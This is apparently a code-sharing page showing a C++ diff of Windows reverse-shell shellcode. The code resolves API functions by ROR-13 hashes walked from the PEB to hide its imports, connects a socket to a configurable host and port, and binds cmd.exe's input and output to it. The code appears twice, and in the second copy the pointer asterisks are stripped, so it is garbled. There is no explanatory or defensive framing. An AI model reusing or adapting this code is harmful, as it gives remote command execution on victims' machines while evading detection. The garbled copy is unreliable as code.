thomasxm · June 9, 2024 21:13
diff --git a/main.cpp b/main.cpp
 #include <WinSock2.h> // must preceed #include <windows.h>
 #include <WS2tcpip.h>
 #include <windows.h>
 #include <winnt.h>
 #include <winternl.h>
 #include <stddef.h>
 #include <stdio.h>

 #define htons(A) ((((WORD)(A) & 0xff00) >> 8) | (((WORD)(A) & 0x00ff) << 8))

 _inline PEB *get_peb() {
 	PEB *p;
 	__asm {
 		mov eax, fs:[30h]
 		mov p, eax
 	}
 	return p;
 }

 #define ROR_SHIFT 13

 constexpr DWORD ct_ror(DWORD n) {
 	return (n >> ROR_SHIFT) | (n << (sizeof(DWORD) * CHAR_BIT - ROR_SHIFT));
 }

 constexpr char ct_upper(const char c) {
 	return (c >= 'a') ? (c - ('a' - 'A')) : c;
 }

 constexpr DWORD ct_hash(const char *str, DWORD sum = 0) {
 	return *str ? ct_hash(str + 1, ct_ror(sum) + ct_upper(*str)) : sum;
 }

 DWORD rt_hash(const char *str) {
 	DWORD h = 0;
 	while (*str) {
 		h = (h >> ROR_SHIFT) | (h << (sizeof(DWORD) * CHAR_BIT - ROR_SHIFT)); // ROR h, 13
 		h += *str >= 'a' ? *str - ('a' - 'A') : *str; // convert the character to uppercase
 		str++;
 	}
 	return h;
 }

 LDR_DATA_TABLE_ENTRY *getDataTableEntry(const LIST_ENTRY *ptr) {
 	int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
 	return (LDR_DATA_TABLE_ENTRY *)((BYTE *)ptr - list_entry_offset);
 }

 // NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
 //       ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
 PVOID getProcAddrByHash(DWORD hash) {
 	PEB *peb = get_peb();
 	LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
 	LIST_ENTRY *ptr = first;
 	do { // for each module
 		LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
 		ptr = ptr->Flink;

 		BYTE *baseAddress = (BYTE *)dte->DllBase;
 		if (!baseAddress) // invalid module(???)
 			continue;
 		IMAGE_DOS_HEADER *dosHeader = (IMAGE_DOS_HEADER *)baseAddress;
 		IMAGE_NT_HEADERS *ntHeaders = (IMAGE_NT_HEADERS *)(baseAddress + dosHeader->e_lfanew);
 		DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
 		if (!iedRVA) // Export Directory not present
 			continue;
 		IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(baseAddress + iedRVA);
 		char *moduleName = (char *)(baseAddress + ied->Name);
 		DWORD moduleHash = rt_hash(moduleName);

 		// The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
 		// element of both arrays refer to the same function. The first array specifies the name whereas
 		// the second the ordinal. This ordinal can then be used as an index in the array pointed to by
 		// AddressOfFunctions to find the entry point of the function.
 		DWORD *nameRVAs = (DWORD *)(baseAddress + ied->AddressOfNames);
 		for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
 			char *functionName = (char *)(baseAddress + nameRVAs[i]);
 			if (hash == moduleHash + rt_hash(functionName)) {
 				WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
 				DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
 				return baseAddress + functionRVA;
 			}
 		}
 	} while (ptr != first);

 	return NULL; // address not found
 }

 #define DEFINE_FUNC_PTR(module, function) \
 	constexpr DWORD hash_##function = ct_hash(module) + ct_hash(#function); \
 	typedef decltype(function) type_##function; \
 	type_##function *##function = (type_##function *)getProcAddrByHash(hash_##function)
 	
 #define DEFINE_FWD_FUNC_PTR(module, real_func, function) \
 	constexpr DWORD hash_##function = ct_hash(module) + ct_hash(real_func); \
 	typedef decltype(function) type_##function; \
 	type_##function *##function = (type_##function *)getProcAddrByHash(hash_##function)

 int main() {
 	// NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
 	//       they're not strictly needed.
 	
 	BYTE b0[] = {'w','s','2','_','3','2','.','d','l','l',0};
 	BYTE b1[] = {'1','2','7','.','0','.','0','.','1',0};
 	//long string for example
 	BYTE b2[] = {'C',':','\\','W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2','\\','c','m','d','.','e','x','e',0};

 	char *sock_lib = (char *)&b0[0];
 	char *r_name = (char *)&b1[0];
 	int r_port = 123;
 	char *cmd = (char *)&b2[0];

 	DEFINE_FUNC_PTR("kernel32.dll", LoadLibraryA);

 	LoadLibraryA(sock_lib);

 	DEFINE_FUNC_PTR("ws2_32.dll", WSAStartup);
 	DEFINE_FUNC_PTR("ws2_32.dll", WSASocketA);
 	DEFINE_FUNC_PTR("ws2_32.dll", WSAConnect);
 	DEFINE_FUNC_PTR("kernel32.dll", CreateProcessA);
 	DEFINE_FUNC_PTR("ws2_32.dll", inet_addr);
 	DEFINE_FUNC_PTR("ws2_32.dll", getaddrinfo);
 	DEFINE_FUNC_PTR("ws2_32.dll", getnameinfo);
 	DEFINE_FWD_FUNC_PTR("ntdll.dll", "RtlExitUserThread", ExitThread);
 	DEFINE_FUNC_PTR("kernel32.dll", WaitForSingleObject);

 	WSADATA wsaData;

 	if (WSAStartup(MAKEWORD(2, 2), &wsaData))
 		goto __end; // error
 	SOCKET sock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
 	if (sock == INVALID_SOCKET)
 		goto __end;

 	addrinfo *result;
 	if (getaddrinfo(r_name, NULL, NULL, &result))
 		goto __end;
 	char ip_addr[16];
 	getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);

 	SOCKADDR_IN remoteAddr;
 	remoteAddr.sin_family = AF_INET;
 	remoteAddr.sin_port = htons(r_port);
 	remoteAddr.sin_addr.s_addr = inet_addr(ip_addr);

 	if (WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
 		goto __end;

 	STARTUPINFOA sInfo;
 	PROCESS_INFORMATION procInfo;
 	SecureZeroMemory(&sInfo, sizeof(sInfo)); // avoids a call to _memset
 	sInfo.cb = sizeof(sInfo);
 	sInfo.dwFlags = STARTF_USESTDHANDLES;
 	sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
 	CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

 	// Waits for the process to finish.
 	WaitForSingleObject(procInfo.hProcess, INFINITE);

 __end:
 	ExitThread(0);

 	return 0;
 }
	#include <WinSock2.h> // must preceed #include <windows.h>
	#include <WS2tcpip.h>
	#include <windows.h>
	#include <winnt.h>
	#include <winternl.h>
	#include <stddef.h>
	#include <stdio.h>

	#define htons(A) ((((WORD)(A) & 0xff00) >> 8) \| (((WORD)(A) & 0x00ff) << 8))

	_inline PEB *get_peb() {
	PEB *p;
	__asm {
	mov eax, fs:[30h]
	mov p, eax
	}
	return p;
	}

	#define ROR_SHIFT 13

	constexpr DWORD ct_ror(DWORD n) {
	return (n >> ROR_SHIFT) \| (n << (sizeof(DWORD) * CHAR_BIT - ROR_SHIFT));
	}

	constexpr char ct_upper(const char c) {
	return (c >= 'a') ? (c - ('a' - 'A')) : c;
	}

	constexpr DWORD ct_hash(const char *str, DWORD sum = 0) {
	return str ? ct_hash(str + 1, ct_ror(sum) + ct_upper(str)) : sum;
	}

	DWORD rt_hash(const char *str) {
	DWORD h = 0;
	while (*str) {
	h = (h >> ROR_SHIFT) \| (h << (sizeof(DWORD) * CHAR_BIT - ROR_SHIFT)); // ROR h, 13
	h += str >= 'a' ? str - ('a' - 'A') : *str; // convert the character to uppercase
	str++;
	}
	return h;
	}

	LDR_DATA_TABLE_ENTRY getDataTableEntry(const LIST_ENTRY ptr) {
	int list_entry_offset = offsetof(LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
	return (LDR_DATA_TABLE_ENTRY )((BYTE )ptr - list_entry_offset);
	}

	// NOTE: This function doesn't work with forwarders. For instance, kernel32.ExitThread forwards to
	// ntdll.RtlExitUserThread. The solution is to follow the forwards manually.
	PVOID getProcAddrByHash(DWORD hash) {
	PEB *peb = get_peb();
	LIST_ENTRY *first = peb->Ldr->InMemoryOrderModuleList.Flink;
	LIST_ENTRY *ptr = first;
	do { // for each module
	LDR_DATA_TABLE_ENTRY *dte = getDataTableEntry(ptr);
	ptr = ptr->Flink;

	BYTE baseAddress = (BYTE )dte->DllBase;
	if (!baseAddress) // invalid module(???)
	continue;
	IMAGE_DOS_HEADER dosHeader = (IMAGE_DOS_HEADER )baseAddress;
	IMAGE_NT_HEADERS ntHeaders = (IMAGE_NT_HEADERS )(baseAddress + dosHeader->e_lfanew);
	DWORD iedRVA = ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
	if (!iedRVA) // Export Directory not present
	continue;
	IMAGE_EXPORT_DIRECTORY ied = (IMAGE_EXPORT_DIRECTORY )(baseAddress + iedRVA);
	char moduleName = (char )(baseAddress + ied->Name);
	DWORD moduleHash = rt_hash(moduleName);

	// The arrays pointed to by AddressOfNames and AddressOfNameOrdinals run in parallel, i.e. the i-th
	// element of both arrays refer to the same function. The first array specifies the name whereas
	// the second the ordinal. This ordinal can then be used as an index in the array pointed to by
	// AddressOfFunctions to find the entry point of the function.
	DWORD nameRVAs = (DWORD )(baseAddress + ied->AddressOfNames);
	for (DWORD i = 0; i < ied->NumberOfNames; ++i) {
	char functionName = (char )(baseAddress + nameRVAs[i]);
	if (hash == moduleHash + rt_hash(functionName)) {
	WORD ordinal = ((WORD *)(baseAddress + ied->AddressOfNameOrdinals))[i];
	DWORD functionRVA = ((DWORD *)(baseAddress + ied->AddressOfFunctions))[ordinal];
	return baseAddress + functionRVA;
	}
	}
	} while (ptr != first);

	return NULL; // address not found
	}

	#define DEFINE_FUNC_PTR(module, function) \
	constexpr DWORD hash_##function = ct_hash(module) + ct_hash(#function); \
	typedef decltype(function) type_##function; \
	type_##function ##function = (type_##function )getProcAddrByHash(hash_##function)

	#define DEFINE_FWD_FUNC_PTR(module, real_func, function) \
	constexpr DWORD hash_##function = ct_hash(module) + ct_hash(real_func); \
	typedef decltype(function) type_##function; \
	type_##function ##function = (type_##function )getProcAddrByHash(hash_##function)

	int main() {
	// NOTE: we should call WSACleanup() and freeaddrinfo() (after getaddrinfo()), but
	// they're not strictly needed.

	BYTE b0[] = {'w','s','2','_','3','2','.','d','l','l',0};
	BYTE b1[] = {'1','2','7','.','0','.','0','.','1',0};
	//long string for example
	BYTE b2[] = {'C',':','\\','W','i','n','d','o','w','s','\\','S','y','s','t','e','m','3','2','\\','c','m','d','.','e','x','e',0};

	char sock_lib = (char )&b0[0];
	char r_name = (char )&b1[0];
	int r_port = 123;
	char cmd = (char )&b2[0];

	DEFINE_FUNC_PTR("kernel32.dll", LoadLibraryA);

	LoadLibraryA(sock_lib);

	DEFINE_FUNC_PTR("ws2_32.dll", WSAStartup);
	DEFINE_FUNC_PTR("ws2_32.dll", WSASocketA);
	DEFINE_FUNC_PTR("ws2_32.dll", WSAConnect);
	DEFINE_FUNC_PTR("kernel32.dll", CreateProcessA);
	DEFINE_FUNC_PTR("ws2_32.dll", inet_addr);
	DEFINE_FUNC_PTR("ws2_32.dll", getaddrinfo);
	DEFINE_FUNC_PTR("ws2_32.dll", getnameinfo);
	DEFINE_FWD_FUNC_PTR("ntdll.dll", "RtlExitUserThread", ExitThread);
	DEFINE_FUNC_PTR("kernel32.dll", WaitForSingleObject);

	WSADATA wsaData;

	if (WSAStartup(MAKEWORD(2, 2), &wsaData))
	goto __end; // error
	SOCKET sock = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
	if (sock == INVALID_SOCKET)
	goto __end;

	addrinfo *result;
	if (getaddrinfo(r_name, NULL, NULL, &result))
	goto __end;
	char ip_addr[16];
	getnameinfo(result->ai_addr, result->ai_addrlen, ip_addr, sizeof(ip_addr), NULL, 0, NI_NUMERICHOST);

	SOCKADDR_IN remoteAddr;
	remoteAddr.sin_family = AF_INET;
	remoteAddr.sin_port = htons(r_port);
	remoteAddr.sin_addr.s_addr = inet_addr(ip_addr);

	if (WSAConnect(sock, (SOCKADDR *)&remoteAddr, sizeof(remoteAddr), NULL, NULL, NULL, NULL))
	goto __end;

	STARTUPINFOA sInfo;
	PROCESS_INFORMATION procInfo;
	SecureZeroMemory(&sInfo, sizeof(sInfo)); // avoids a call to _memset
	sInfo.cb = sizeof(sInfo);
	sInfo.dwFlags = STARTF_USESTDHANDLES;
	sInfo.hStdInput = sInfo.hStdOutput = sInfo.hStdError = (HANDLE)sock;
	CreateProcessA(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo);

	// Waits for the process to finish.
	WaitForSingleObject(procInfo.hProcess, INFINITE);

	__end:
	ExitThread(0);

	return 0;
	}
No results found